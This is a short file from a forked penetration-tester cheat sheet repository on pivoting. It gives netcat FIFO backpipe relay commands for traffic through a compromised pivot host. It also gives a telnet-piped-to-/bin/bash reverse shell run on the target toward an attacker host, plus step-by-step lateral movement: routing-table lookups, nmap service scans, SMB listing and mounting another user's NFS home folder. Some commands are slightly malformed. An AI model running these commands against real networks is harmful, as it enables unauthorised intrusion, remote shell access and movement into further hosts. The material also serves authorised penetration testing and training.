forked from pavetheway/Pentester_Cheat_Sheet
/
pivoting
31 lines (22 loc) · 929 Bytes
/
pivoting
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# alex <alexbujduveanu>
# To make a FIFO in the file system
--> mknod [name of file] p
# Pivoting with a backpipe #
# On the attacker:
--> nc [pivot host]
# On the pivot host
--> nc localhost 80 <[FIFO file name] | nc -l -p 4444 >[FIFO file name]
# Telnet variant (when netcat is not available on the target) #
# Listen on port 80 in terminal 1 on the attack machine
--> nc -l -n -v -p 80
# Listen on port 443 in terminal 2 on the attack machine
--> nc -l -n -v -p 443
# On the target machine:
--> telnet [attack host] 80 | /bin/bash | telnet [attack host]
Kennedy Sanchez <ksanchez@cldeveloper.com>
[Step by step]
-> Exploiting System
-> Look for address in the routing table(netstat -rn | arp -a)
-> Look for services in the found ips(nmap -n -sV [IP])
-> If found shared folder(NFS) execute (smbclient -L [IP] | smbmount -e [IP])
-> Mounting the folder (mount -o nolock -t nfs 10.0.0.10:/home/ksanchez /mnt/shared)